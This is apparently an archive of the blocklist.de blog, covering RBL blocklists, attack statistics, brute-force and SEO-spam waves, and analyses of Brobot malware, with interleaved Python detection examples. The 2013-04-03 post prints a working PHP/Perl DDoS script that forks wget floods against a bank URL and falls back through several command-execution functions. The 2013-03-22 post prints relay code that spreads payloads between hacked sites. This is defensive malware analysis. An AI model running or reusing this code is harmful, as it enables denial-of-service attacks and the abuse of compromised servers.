2010
04.23

The blog of www.blocklist.de is mainly used to archive statistics.

When there is something interesting, it will be published here. This includes, for example, new attacks or waves with new patterns, or cases where a type of attack could be attributed to a botnet or a worm.

2013
06.13

Currently we have 3 RBLDNS servers which list the attacker IPs for 48 hours after the last attack, in the following categories:
http://www.blocklist.de/en/rbldns.html

Name / URL                         Description / Content
apache.bl.blocklist.de             Apache, RFI, w00tw00t, SQL injection, forum spam + http://honeystats.info/
bruteforcelogin.bl.blocklist.de    all IPs which attack Joomla, WordPress and other web logins with brute force
bl.blocklist.de                    all IP addresses (all services)
all.bl.blocklist.de                all IP addresses (all services)
ftp.bl.blocklist.de                FTP: only IPs that run FTP brute-force attacks
imap.bl.blocklist.de               IMAP, POP3, SASL, webmail logins ...
mail.bl.blocklist.de               mail/postfix, 5xx errors (blacklist entries), relaying ...
ssh.bl.blocklist.de                IPs that run SSH attacks
sip.bl.blocklist.de                IPs that have tried SIP/Asterisk brute-force logins

On the USA server we have the rbldns stats enabled. rbldns generates the count of queries, the count of matches and the bytes received and sent.
Every 10 minutes the RBL server gets a summary of about:
19 M queries
1 M matches
The value varies on weekends and during attack runs.

The RBL servers also return in the TXT record the service name, e.g. "ssh", and the Unix timestamp of the last reported attack:
Infected System (Service: apacheddos, Last-Attack: 1370990468), see http://www.blocklist.de/en/view.html?ip=$ip
From time to time there were over 20,000 IPs listed in the complete list.

2013
06.07

The brute-force login attack on WordPress and Joomla has been running for a few weeks:

http://support.hostgator.com/articles/specialized-help/technical/wordpress/wordpress-login-brute-force-attack

We currently have 16582 IP addresses listed on the bruteforcelogin list.

In the last days the attackers use in most requests (we think over 90%) the User-Agent "Firefox/19.0":

189.143.62.117 - - [06/Jun/2013:17:51:46 +0200] "POST wp-login.php HTTP/1.0" 200 4555 "http://referer-domain.tld/" "Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0"

We found a little bit of the malware code on one site, but it was not complete. If you received a report from us and found the malware script, please send it to us.

Thank you!
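As an added illustration for the brute-force wave above (our Python, not blocklist.de's code), here is a detector for an Apache combined-format access log: it counts POSTs to login endpoints per IP inside a sliding time window and reports the User-Agents used, so a wave like the Firefox/19.0 one shows up as one IP with many login POSTs and a single UA. The sample lines are constructed from the log line quoted in the post; the threshold, the window and the list of login paths are our assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Added example, not blocklist.de code: flag IPs that hammer login endpoints in an
# Apache combined-format access log. Threshold, window and login paths are assumptions.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"
# WordPress login, WordPress XML-RPC, Joomla administrator login
LOGIN_PATHS = ("wp-login.php", "xmlrpc.php", "administrator/index.php")


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    return rec


def is_login_post(rec):
    # The captured line logs the path without a leading slash ("POST wp-login.php"),
    # so compare on the trailing path component rather than on an exact string.
    path = rec["path"].split("?", 1)[0].lstrip("/")
    return rec["method"] == "POST" and any(path.endswith(p) for p in LOGIN_PATHS)


def find_bruteforce(lines, threshold=5, window_seconds=600):
    """Return {ip: {"posts": n, "user_agents": [...]}} for every IP that sent at least
    `threshold` login POSTs inside any `window_seconds` window."""
    times = defaultdict(list)
    agents = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec and is_login_post(rec):
            times[rec["ip"]].append(rec["time"])
            agents[rec["ip"]].add(rec["ua"])
    hits = {}
    for ip, stamps in times.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):          # sliding window over sorted timestamps
            while (stamps[end] - stamps[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = {"posts": len(stamps), "user_agents": sorted(agents[ip])}
                break
    return hits


# Constructed sample: the line quoted in the post, repeated with new timestamps,
# plus one legitimate login and one page view from another address.
UA_19 = "Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0"
SAMPLE_LOG = [
    '189.143.62.117 - - [06/Jun/2013:17:51:%02d +0200] "POST wp-login.php HTTP/1.0" 200 4555 '
    '"http://referer-domain.tld/" "%s"' % (sec, UA_19)
    for sec in (46, 47, 49, 52, 55, 58)
] + [
    '10.0.0.5 - - [06/Jun/2013:17:52:01 +0200] "POST /wp-login.php HTTP/1.1" 302 0 '
    '"http://example.test/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) Firefox/21.0"',
    '10.0.0.5 - - [06/Jun/2013:17:52:03 +0200] "GET /wp-admin/ HTTP/1.1" 200 12000 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/21.0"',
]

if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

The sliding window matters more than the raw count: a busy site sees many legitimate logins per day, but five login POSTs from one address inside ten minutes is what the wave looks like in the log.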

 

2013
06.02

After the last "URL reporting" mostly *.pl domains were used, but now we have found over 9,181 URLs from *.blog.com which were abused by SEO spammers to get traffic from good sites via blog.com to their "money sites".

On their money sites they offer to make money via clickbank with affiliates.

(Screenshots: avervurm.blog.com, 4 images)

Other blog.com URLs, with the same or slightly different content, but all redirecting to clickbank.com:

(Screenshots: grinevaskij1970.blog.com, 2 images; pirevilka.blog.com)

Some links go to the "money site" of the SEO spammer via tinyurl.com: "hxxp://tinyurl.com/cszvyuf/go8.php?aHR0cDovL2p1bDRvbm9rODUuZWJheWNlcnQuaG9wLmNsaWNrYmFuay5uZXQ="

And then to: "http://www.jobreplacementformula.com/clickbank.php?hop=codelocker" or directly to clickbank.com

(Screenshots: jobreplacementformula.com, 2 images)

And from there, all links go to hxxp://www.lottomasterformula.com like this:

hxxp://www.lottomasterformula.com/dlguard/dlg/sell.php?prodData=cb%2C6

and then to clickbank.com:

hxxps://ssl.clickbank.net/order/orderform.html?time=1370165174&vvvv=6562617963657274&item=1&detail=Job+Replacement+Formula+67&vvar=detail%3DJob+Replacement+Formula+67%26dlgp%3D6&oaref=01.09B9DCCD9E0E71A5790AC3235281919F0D991A7DEB89597DD4E6AA7D1731DA971A6BC929777E2ED95D5AF51F83B0AA90A0AF6050AB48256725481747D07F78E1ECBF3B2FC242EF671C76543A63F84442719A7B93

From there you get an order form to buy the book on how to make money with clickbank.com, for only "$67.00":

(Screenshot: clickbank.com order form)

At the bottom there is a text from a banner with "codelocker.blogcom" which was not replaced by JavaScript in the Chrome browser inside the virtual machine:

(Screenshot: clickbank.com, banner text)

We have reported the URLs via the ticket system to blog.com and are waiting for a response. At this time I don't think that blog.com uses clickbank.com to place ads on their site...

In most cases of sites with user-generated content, the URLs will be disabled/deleted.

Currently we have over 2,677,883 URLs in our database which were posted by spammers into our honeypot systems. In the coming time we will look at how many new URLs come in daily and add an RBL list with these URLs.

If you are interested in these URLs, please contact us.

2013
05.30

We have now inserted into the TXT record of the RBLDNS the Unix timestamp of the last attack we received.
We list IPs for 48 hours in our lists, but dynamic addresses are reassigned by some providers after 12 hours.
Now you can see when blocklist.de received the last attack from the queried IP.

For example, for the IP 186.241.250.183:
# dig 183.250.241.186.apache.bl.blocklist.de TXT

;; ANSWER SECTION:
183.250.241.186.apache.bl.blocklist.de. 2467 IN TXT "Infected System (Service: apacheddos, Last-Attack: 1369828413), see http://www.blocklist.de/en/view.html?ip=186.241.250.183"

You can parse the Unix timestamp between "Last-Attack: " and ")".

Another way would be to add the age of the last attack in hours to the A record, like this:
127.0.0.x: the last attack is under one hour old
127.0.2.x: the last attack is older, about 2 hours

Please write in the comments about this second way of putting the age into the A record.
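To make the lookup concrete, here is an added Python example (our code, not blocklist.de's). It covers both the RBLDNS TXT record described in the post of 2013-06-13 and the timestamp and A-record idea in this post: it builds the reversed query name used in the dig command above, parses the service name and the Last-Attack timestamp out of the TXT text, turns that into an age in hours, and encodes/decodes the proposed 127.0.<hours>.x answer. The zone names and the TXT format are taken from the posts; fixing the fourth octet to 1, capping the hour count at 255 and treating any 127.x answer as "listed" are our assumptions, and the dig wrapper needs network access and the dig binary.

```python
import re
import subprocess
import time
from ipaddress import IPv4Address

# Added example, not blocklist.de code. Assumed: the zone names and the TXT format
# quoted in the posts; the 127.0.<hours>.x A-record scheme is the proposal from the
# post, with the fourth octet fixed to 1 here and the hour count capped at 255.

TXT_PATTERN = re.compile(r"Service:\s*(?P<service>[^,)]+),\s*Last-Attack:\s*(?P<ts>\d+)\)")


def query_name(ip, zone="bl.blocklist.de"):
    """Reverse the octets and append the zone, as in the dig example:
    186.241.250.183 -> 183.250.241.186.apache.bl.blocklist.de"""
    octets = str(IPv4Address(ip)).split(".")   # IPv4Address rejects malformed input
    return ".".join(reversed(octets)) + "." + zone


def parse_txt(txt):
    """Pull the service name and the Unix timestamp of the last attack out of the TXT text."""
    m = TXT_PATTERN.search(txt)
    if m is None:
        raise ValueError("TXT record is not in the blocklist.de format")
    return {"service": m.group("service").strip(), "last_attack": int(m.group("ts"))}


def age_hours(last_attack, now=None):
    """Whole hours since the last reported attack; 0 while it is under one hour old."""
    now = int(time.time()) if now is None else now
    return max(0, now - last_attack) // 3600


def encode_age_a_record(hours):
    """Proposed A-record answer carrying the age in the third octet (capped at 255)."""
    return "127.0.%d.1" % min(hours, 255)


def decode_age_a_record(a_record):
    """Read the hour count back from a 127.0.<hours>.x answer."""
    octets = a_record.split(".")
    if len(octets) != 4 or octets[:2] != ["127", "0"]:
        raise ValueError("not a 127.0.x.x listing answer")
    return int(octets[2])


def is_listed(a_record):
    """A 127.x answer means the IP is listed; no answer (NXDOMAIN) means it is not."""
    return a_record is not None and a_record.startswith("127.")


def lookup_txt(ip, zone="apache.bl.blocklist.de"):
    """Live lookup via dig, mirroring the command in the post; returns the TXT text or None.
    Needs network access and the dig binary, so it is not exercised offline."""
    out = subprocess.run(["dig", "+short", query_name(ip, zone), "TXT"],
                         capture_output=True, text=True, check=True).stdout.strip()
    return out.strip('"') or None


if __name__ == "__main__":
    # Constructed from the answer section quoted in the post.
    sample = ('Infected System (Service: apacheddos, Last-Attack: 1369828413), '
              'see http://www.blocklist.de/en/view.html?ip=186.241.250.183')
    info = parse_txt(sample)
    print(query_name("186.241.250.183", "apache.bl.blocklist.de"))
    print(info, "age now (h):", age_hours(info["last_attack"]))
    print(encode_age_a_record(age_hours(info["last_attack"], now=1369828413 + 7200)))
```

Because listings expire after 48 hours, the third octet never gets near 255 in practice; the cap is only there so that a stale cache or a clock skew cannot produce an invalid address.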

2013
04.19

Currently, blocklist.de has the following Stats/User:

User: 853

Server: 1015

Attacks: 290,425,621

Reports: 4,546,850

Daily Mails: ~170100 (lower limit) ~360000 (high limit)

Web-Traffic: ~220 GB

RBL-/API-Traffic: ~70 GB

Mail (In/Out)-Traffic: ~2130 GB. Since 04/2013 we use the local IPs, so the traffic between the reporting servers is no longer included and the traffic is going down.

Traffic over IPv6 (Mail, Web..): ~6GB

On top of this data there is 2,1TB of traffic between the web/mail server and the MySQL server. The MySQL server sends out ~3,8 GB each hour.

The MySQL server now uses 40% of 32GB RAM, and the system load is on average 1.00.

The web server does not use its full 13GB RAM and the system load is under 0,7. The open connections are ~2000.

The complete traffic from all systems is roughly 4,2TB in March 2013.

2013
04.03

Since 2013-04-02 T18:05 UTC, the brobot has started attacks against the US banks again.

It now sends the following code and executes it:
(Screenshot: brobot-2013-04-03)

Here is one of the complete codes (it uses different codes) (newlines inserted by us to make it readable):


function randomvar(){
$a=chr(rand(97,122));
$b=rtrim(base64_encode(rand(100,10000)),'=');
return $a.$b;
}
$url = "http://www.bbt.com/bbtdotcom/financial-education/home_and_residence/accumulate_down_payment.page";
$rand = md5(microtime().rand(0,500));
if(preg_match("/\?/",$url))
$url .= "&".randomvar()."=".substr($rand,0,rand(4,10));
else
$url .= "?".randomvar()."=".substr($rand,0,rand(4,10));
if(!function_exists('scandir'))
{
function scandir($a,$b=false,$c=true)
{
$d=array();
if($e=opendir($a))
{
while(false!==($f=readdir($e)))
{
if(($f!="."&&$f!="..")||$c==true)
{
if($b==false)
if(is_dir($f))
continue;
array_push($d,basename($f));
}
}
closedir($e);
}
return $d;
}
}

function on_exit()
{
echo "###Assassin###\n";
echo "\nuau-repeat";
}

if(function_exists('register_shutdown_function'))
register_shutdown_function("on_exit");

fwrite(fopen($h=tgya8siudj().'/'.md5(microtime()),'w'),
"unlink '$h';
$time=time();
for($i = 0;$i < 100;$i++)
{
if(fork())
{
}
else
{
$j=0;while(time()-$time<120)
{
$j++;
if($j % 100 == 0)
{
sleep 1;
}
system("wget -U 'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8' -t 45 --delete-after --no-check-certificate '$url' 2>&1 &\");
}
last;
}
}"
); # fwrite Ends

iyiuo("perl $h");
echo "###Assassin###";
echo "\nuau-repeat";

function iyiuo($r)
{
$s="";
if(!empty($r))
{
if(function_exists('exec'))
{
@exec($r,$s);
$s=join("\n",$s);
}
elseif(function_exists('shell_exec'))
$s=@shell_exec($r);
elseif(function_exists('system'))
{
@ob_start();
@system($r);
$s=@ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($r);
$s=@ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('popen') and @is_resource($t=@popen($r,"r")))
{
$s="";
while(!@feof($t))
$s.=@fread($t,1024);
@pclose($t);
}
elseif(function_exists('proc_open'))
{
$u=proc_open($r,array(array("pipe","r"),array("pipe","w"),array("pipe","w")),$v);
$s=stream_get_contents($v[1]);
fclose($v[0]);
fclose($v[1]);
fclose($v[2]);
proc_close($u);
}
}
return $s;
}

function gyhuijoakosdoj()
{
$j="";
if(!isset($_SERVER["DOCUMENT_ROOT"]))
$_SERVER["DOCUMENT_ROOT"]=substr($_SERVER["SCRIPT_FILENAME"],0,-strlen($_SERVER["SCRIPT_NAME"]));
$k[]=$_SERVER["DOCUMENT_ROOT"];
while($k)
{
$l=array_pop($k);
if($m=scandir($l))
{
$n=0;
while(isset($m[$n]))
{
if($m[$n]!=="."&&$m[$n]!=="..")
{
$o="{$l}/{$m[$n]}";
if(is_dir($o))
{
$k[]=$o;
if(@is_writable($o))
{
return $o;
}
}
}
$n++;
}
}
}
return false;
}

function tgya8siudj()
{
if(@is_writable('/tmp'))
return '/tmp';
elseif(@is_writable(preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME'])))
return preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME']);
elseif(!function_exists("sys_gt_temp_dir"))
{
if(!empty($_ENV["TMP"])and@is_writable($_ENV["TMP"]))
return realpath($_ENV["TMP"]);
elseif(!empty($_ENV["TMPDIR"])and@is_writable($_ENV["TMPDIR"]))
return realpath($_ENV["TMPDIR"]);
elseif(!empty($_ENV["TEMP"])and@is_writable($_ENV["TEMP"]))
return realpath($_ENV["TEMP"]);
else
{
$a=gyhuijoakosdoj();
if($a==!false)
return $a;
$p=tempnam(md5(uniqid(rand(),TRUE)),"");
if($p)
{
$q=realpath(dirname($p));
@unlink($p);
return $q;
}
else
return false;
}
}
else
return sys_get_temp_dir();
}
exit;

Complete code, formatted

It now has its own "scan_dir" function for when that function does not exist or is disabled.
And it now tries to run the DDoS via exec with wget, or via proc_open and other functions, but no longer via fsockopen or streams...
Are there too many systems without socket support?
Update: here is a code version with sockets

The hackers have written a new phase for "Phase3/W5 Operation Ababil".
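From the defender's side, the property of the code above that matters most is the fallback chain through exec, shell_exec, system, passthru, popen and proc_open: the bot takes the first one that is still enabled, so blocking a single function changes nothing. The following Python example is added here (our code, not blocklist.de's and not the bot's): it scans PHP source for the marker strings visible above and reports which of the six primitives a php.ini disable_functions line still leaves available. The marker strings and the probe order come from the captured code; the regexes, the sample PHP fragment and the two php.ini fragments are ours.

```python
import re

# Added example, not blocklist.de code. The marker strings and the exec fallback order
# are taken from the captured code above; the regexes and the php.ini parsing are ours.

# Order in which the captured code probes for a way to run a shell command.
EXEC_FUNCTIONS = ("exec", "shell_exec", "system", "passthru", "popen", "proc_open")

INDICATORS = {
    "assassin_marker": re.compile(r"###Assassin###"),
    "uau_repeat_marker": re.compile(r"uau-repeat"),
    "shutdown_hook": re.compile(r"register_shutdown_function\s*\("),
    "exec_fallback_chain": re.compile(
        r"function_exists\s*\(\s*'(?:%s)'\s*\)" % "|".join(EXEC_FUNCTIONS)),
    "wget_flood_cmd": re.compile(
        r"wget\s+-U\s+'[^']*'\s+-t\s+\d+\s+--delete-after\s+--no-check-certificate"),
}


def scan_php_source(src):
    """Names of the indicators present, plus which exec primitives the source probes for."""
    found = sorted(name for name, rx in INDICATORS.items() if rx.search(src))
    probed = set(re.findall(r"function_exists\s*\(\s*'(\w+)'\s*\)", src)) & set(EXEC_FUNCTIONS)
    return {"indicators": found, "exec_functions_probed": sorted(probed)}


def parse_disable_functions(ini_text):
    """Set of names in php.ini's disable_functions; ';' comments ignored, last assignment wins."""
    disabled = set()
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()
        m = re.match(r"disable_functions\s*=\s*(.*)$", line)
        if m:
            value = m.group(1).strip().strip('"')
            disabled = {f.strip() for f in value.split(",") if f.strip()}
    return disabled


def remaining_exec_functions(ini_text):
    """Primitives in the fallback chain that this php.ini still leaves enabled."""
    disabled = parse_disable_functions(ini_text)
    return [f for f in EXEC_FUNCTIONS if f not in disabled]


# Constructed sample: a fragment carrying the same markers as the captured code.
SAMPLE_PHP = r"""<?php
function on_exit(){ echo "###Assassin###\n"; echo "\nuau-repeat"; }
if(function_exists('register_shutdown_function')) register_shutdown_function("on_exit");
if(function_exists('exec')) { @exec($r,$s); }
elseif(function_exists('shell_exec')) $s=@shell_exec($r);
"""

# Constructed php.ini fragments: the first blocks only exec and system, which the
# fallback chain simply steps over; the second covers the whole chain.
WEAK_INI = "; php.ini\ndisable_functions = exec,system\n"
HARDENED_INI = '; php.ini\ndisable_functions = "exec,shell_exec,system,passthru,popen,proc_open"\n'

if __name__ == "__main__":
    print(scan_php_source(SAMPLE_PHP))
    print("weak ini leaves:", remaining_exec_functions(WEAK_INI))
    print("hardened ini leaves:", remaining_exec_functions(HARDENED_INI))
```

The php.ini check is the more useful half: hosters often disable exec and system and consider the box hardened, while shell_exec, popen and proc_open remain open, and that is exactly the gap the chain above is written to find.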

2013
03.22

In the last days the BroBot runners have run a new wave and send POST requests with c_id to the hacked sites.

The data (base64 encoded) contains the following script/data:

(Screenshot: brobot-runners)

The script calls in each POST request 140 to 180 other hacked URLs:

(Screenshot: brobot-runners2)


....
function send($target){
forkill();
if(strpos($target,$_SERVER["SERVER_NAME"]) !== false){
global $code;
}    else{
$code = $_REQUEST["c_id"];
}
if(!preg_match("/http/i",$target))
$target = "http://$target";
$parts = @parse_url($target);
$host = $parts["host"];
$path = $parts["path"];
if($path=="")$path="/";
$data = @http_build_query(array("c_id" => $code ,'gnu[]' => 'base64_decode', "fr" => $_REQUEST["fr"], "ksess" => $_REQUEST["ksess"]));
$request = "POST $path HTTP/1.1\r\n"
."Host: $host\r\n"
."User-Agent: Mozilla/5.0 Firefox/3.6.12\r\n"
."Accept: */*\r\n"
."Accept-Language: en-us,en;q=0.5\r\n"
."Accept-Encoding: deflate\r\n"
."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
."Content-type: application/x-www-form-urlencoded\r\n"
."Content-Length: ".strlen($data)."\r\n"
."Connection: Close\r\n"
."Cache-Control: no-cache\r\n\r\n{$data}";
forkill();
$fp = @fsockopen($host, 80);
@stream_set_timeout($fp, 3000);
@fwrite($fp, $request);
@stream_set_blocking($fp, 0);
return $fp;
}
if((isset($_REQUEST["rf"]) && $_REQUEST["rf"] == 1) || $_REQUEST["fr"] == 1){
echo @implode("", @file(writabledir()."/res"."2eb7e37x28e"));
@unlink(writabledir()."/res"."2ebx839d1fb28e");
flush();
}
$fn = lock();
....

 

We have currently found 3357 URLs with hacked Joomla installations/sites.

Over 2.500 scripts/URLs are online. In the next days we will report the sites to Bank of America or directly to the hoster to check and fix them.

In the next days we will analyse the complete PHP code and write a little bit about what is not good and could be done better :-)

If you want the complete code, please contact us.
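An added example (our Python, not blocklist.de's and not the runner's code) for spotting the relay request that send() above builds, seen from the receiving web server: it parses a raw HTTP request and lists the traits the captured code hard-codes, namely the c_id parameter, gnu[]=base64_decode, the fr and ksess control parameters, the fixed User-Agent string and the deflate-only Accept-Encoding. The header layout follows the captured request; the host name and the request bodies are constructed, and the c_id value is a placeholder rather than a real payload.

```python
from urllib.parse import parse_qs

# Added example, not blocklist.de code. Parameter names, header values and the
# User-Agent string come from the captured send() function; the scoring is ours.


def parse_raw_request(raw):
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def brobot_runner_indicators(raw):
    """List the traits of the runner's relay request that this request exhibits."""
    req = parse_raw_request(raw)
    if req["method"] != "POST":
        return []
    ctype = req["headers"].get("content-type", "")
    if not ctype.lower().startswith("application/x-www-form-urlencoded"):
        return []
    params = parse_qs(req["body"], keep_blank_values=True)   # decodes gnu%5B%5D to gnu[]
    reasons = []
    if "c_id" in params:
        reasons.append("c_id payload parameter")
    if "base64_decode" in params.get("gnu[]", []):
        reasons.append("gnu[]=base64_decode decoder hint")
    if "fr" in params and "ksess" in params:
        reasons.append("fr+ksess control parameters")
    if req["headers"].get("user-agent") == "Mozilla/5.0 Firefox/3.6.12":
        reasons.append("hard-coded User-Agent")
    if req["headers"].get("accept-encoding", "").lower() == "deflate":
        reasons.append("Accept-Encoding: deflate only")
    return reasons


def build_sample(body, user_agent, accept_encoding="deflate"):
    """Constructed request in the exact header layout the captured code emits."""
    return ("POST /index.php HTTP/1.1\r\n"
            "Host: victim.example\r\n"
            "User-Agent: %s\r\n"
            "Accept: */*\r\n"
            "Accept-Language: en-us,en;q=0.5\r\n"
            "Accept-Encoding: %s\r\n"
            "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
            "Content-type: application/x-www-form-urlencoded\r\n"
            "Content-Length: %d\r\n"
            "Connection: Close\r\n"
            "Cache-Control: no-cache\r\n\r\n%s") % (user_agent, accept_encoding, len(body), body)


# Constructed bodies: in the real request c_id carries the base64 script; here it is
# only base64("PLACEHOLDER"). The second body is an ordinary login form post.
RELAY_BODY = "c_id=UExBQ0VIT0xERVI%3D&gnu%5B%5D=base64_decode&fr=0&ksess=abc123"
LOGIN_BODY = "username=alice&password=secret&remember=1"

if __name__ == "__main__":
    print(brobot_runner_indicators(build_sample(RELAY_BODY, "Mozilla/5.0 Firefox/3.6.12")))
    print(brobot_runner_indicators(build_sample(
        LOGIN_BODY, "Mozilla/5.0 (X11; Linux x86_64) Firefox/21.0", "gzip, deflate")))
```

The parameter names are the strongest signal; the User-Agent and Accept-Encoding checks are only there because the captured code hard-codes them, and they would be the first things a new version changes.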

2013
03.19

We currently have the following servers with the following time zones (locations):

Count Timezone (ordered by count, desc):

662 Europe/Berlin
29 Europe/London
26 Europe/Amsterdam
25 Europe/Zurich
18 Europe/Vienna
18 Europe/Paris
15 Europe/Rome
13 Europe/Copenhagen
11 GMT+0000
10 America/Los_Angeles
8 America/New_York
7 Europe/Madrid
5 Europe/Helsinki
5 America/Chicago
4 Pacific/Auckland
4 America/Toronto
4 Asia/Kolkata
3 Asia/Vientiane
3 Asia/Tehran
3 Australia/Sydney
3 Europe/Moscow
3 Europe/Prague
2 Europe/Riga
2 America/Phoenix
2 Europe/Bratislava
2 Australia/Brisbane
2 Asia/Manila
2 Asia/Jakarta
1 Europe/Istanbul
1 Europe/Bucharest
1 Australia/Hobart
1 Europe/Luxembourg
1 America/Mexico_City
1 Europe/Lisbon
1 America/Montreal
1 Europe/Ljubljana
1 Asia/Bangkok
1 Asia/Shanghai
1 America/Denver
1 Europe/Warsaw
1 Asia/Singapore
1 Asia/Hong_Kong
1 Europe/Volgograd
1 America/Sao_Paulo
1 Europe/Kiev
1 Asia/Brunei
1 Europe/Athens

 

Count Timezone (ordered by timezone, asc):

 

5 America/Chicago
1 America/Denver
10 America/Los_Angeles
1 America/Mexico_City
1 America/Montreal
8 America/New_York
2 America/Phoenix
1 America/Sao_Paulo
4 America/Toronto
1 Asia/Bangkok
1 Asia/Brunei
1 Asia/Hong_Kong
2 Asia/Jakarta
4 Asia/Kolkata
2 Asia/Manila
1 Asia/Shanghai
1 Asia/Singapore
3 Asia/Tehran
3 Asia/Vientiane
2 Australia/Brisbane
1 Australia/Hobart
3 Australia/Sydney
26 Europe/Amsterdam
1 Europe/Athens
662 Europe/Berlin
2 Europe/Bratislava
1 Europe/Bucharest
13 Europe/Copenhagen
5 Europe/Helsinki
1 Europe/Istanbul
1 Europe/Kiev
1 Europe/Lisbon
1 Europe/Ljubljana
29 Europe/London
1 Europe/Luxembourg
7 Europe/Madrid
3 Europe/Moscow
18 Europe/Paris
3 Europe/Prague
2 Europe/Riga
15 Europe/Rome
18 Europe/Vienna
1 Europe/Volgograd
1 Europe/Warsaw
25 Europe/Zurich
11 GMT+0000
4 Pacific/Auckland

 

Old servers that have no location/time zone, or that never sent reports from a service whose logs carry a time zone, are not listed here.

2013
03.19

The statistics for February were a little bit wrong, because the stats included the internal traffic between the MX and reporting servers in the same data center.
In the statistics from 03/2013 onward, the internal traffic is no longer included.

Currently, blocklist.de has the following Stats/User:

User: 800

Server: 955

Attacks: 266,788,236

Reports: 4,354,768

Daily Mails: ~200100 (lower limit) ~450000 (high limit)

Web-Traffic: ~200 GB

RBL-/API-Traffic: ~60 GB

Mail (In/Out)-Traffic: ~2600 GB (but this included the internal traffic). Since 03/2013 we use the local IPs, so the traffic between the reporting servers is no longer included and the traffic is going down.

Traffic over IPv6 (Mail, Web..): ~3GB

On top of this data there is 2,5TB of traffic between the web/mail server and the MySQL server. The MySQL server sends out ~5,2 GB each hour.

The MySQL server now uses 50% of 32GB RAM, and the system load is on average 1.20.

The web server does not use its full 12GB RAM and the system load is under 0,7. The open connections are ~4000.

The complete traffic from all systems is roughly 3,9TB in February 2013.
Only about ~1,9 TB without the internal traffic between the MX and reporting servers.

2013
01.30

Currently, blocklist.de has the following Stats/User:

User: 738

Server: 882

Attacks: 187,080,505

Reports: 4,139,547

Daily Mails: ~400100

Web-Traffic: ~60 GB

RBL-/API-Traffic: ~80 GB (all Mirrors)

Mail (In/Out)-Traffic: ~~900 GB

Traffic over IPv6 (Mail, Web..): ~3GB

On top of this data there is 3TB of traffic between the web/mail server and the MySQL server. The MySQL server sends out ~4,7 GB each hour.

The MySQL server now uses 40% of 32GB RAM, and the system load is on average 0.80.

The web server does not use its full 9GB RAM and the system load is under 1 (thanks nginx). The open connections are ~7000.

The complete traffic from all systems is roughly 1,5TB in January 2013.